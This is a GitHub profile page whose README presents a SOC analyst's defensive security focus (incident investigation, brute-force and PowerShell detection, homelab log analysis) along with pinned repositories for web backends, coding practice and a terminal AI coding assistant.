Skip to content
View ilyesHamdiii's full-sized avatar
:electron:
Hungry for more
:electron:
Hungry for more
4 followers · 7 following

Block or report ilyesHamdiii

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don’t include any personal information such as legal names or email addresses. Markdown is supported. This note will only be visible to you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse
ilyesHamdiii/README.md

Hi, I'm Ilyes HAMDI

SOC Analyst | Detection Engineering | Log & Threat Analysis

I specialize in investigating security incidents, performing threat hunting, and building detection logic from real telemetry in homelab environments. My goal is to translate raw logs into actionable security insights and strengthen defensive operations.

🔍 Featured SOC Work

Incident Response & Threat Hunting

  • PowerShell Execution Investigation: Analyzed Windows Event Logs & Sysmon to detect suspicious encoded PowerShell usage
  • Brute Force & Authentication Anomalies: Investigated repeated login failures and lateral movement attempts
  • Structured Reporting: Each investigation includes hypothesis, evidence, analysis, and conclusion

Detection Engineering

  • Brute Force Detection (Event ID 4625) – SPL/KQL queries with thresholds and false positive considerations
  • Suspicious PowerShell Execution Detection – Event monitoring with logic and limitation notes
  • Approach: Hypothesis-driven, log-based, detection-focused

🧪 Homelab & Learning

  • Simulate real-world attack scenarios
  • Collect and analyze logs from multiple systems
  • Test and refine detection rules for accuracy and efficiency

💻 Backend & Supporting Skills

While my focus is security, I leverage backend experience to support automation and analysis:

  • Languages: Python, Java
  • Frameworks: FastAPI, Django
  • Databases: PostgreSQL, MySQL
  • Tools: Docker, Postman

Applied Python for log parsing and detection rule prototyping.

📂 Featured Projects

📈 Current Focus

  • Expanding detection logic depth and coverage
  • Improving threat hunting methodology
  • Strengthening understanding of attacker techniques & MITRE ATT&CK mapping

📫 Connect

Pinned Loading

  1. blue-team-portfolio blue-team-portfolio Public

    Practical SOC lab work focused on endpoint monitoring, incident investigation, and detection tuning in a controlled environment.

    Python

  2. daily-leetcode-solutions daily-leetcode-solutions Public

    A personal daily archive of LeetCode problem-solving efforts using Python.

    Python

  3. HIM---Men-s-Clothing-Ecommerce-Application HIM---Men-s-Clothing-Ecommerce-Application Public

    HIM is a Django-based ecommerce application for a men’s clothing brand.

    CSS

  4. Healthcare-API--fastapi Healthcare-API--fastapi Public

    A modern FastAPI backend for healthcare management, supporting users, appointments, articles, and notifications. Features JWT authentication, Docker containerization, and Nginx reverse proxy for ef…

    Python

  5. Cipher-the-ai-agent Cipher-the-ai-agent Public

    Cipher is your AI friend in the terminal — helping you write, refactor, and manage Python code without ever leaving the shell.

    Python

  6. local_aid local_aid Public

    A Django-powered backend API for a community platform that connects people who need help with those who can provide it. This repository contains the server-side implementation with Django templates…

    HTML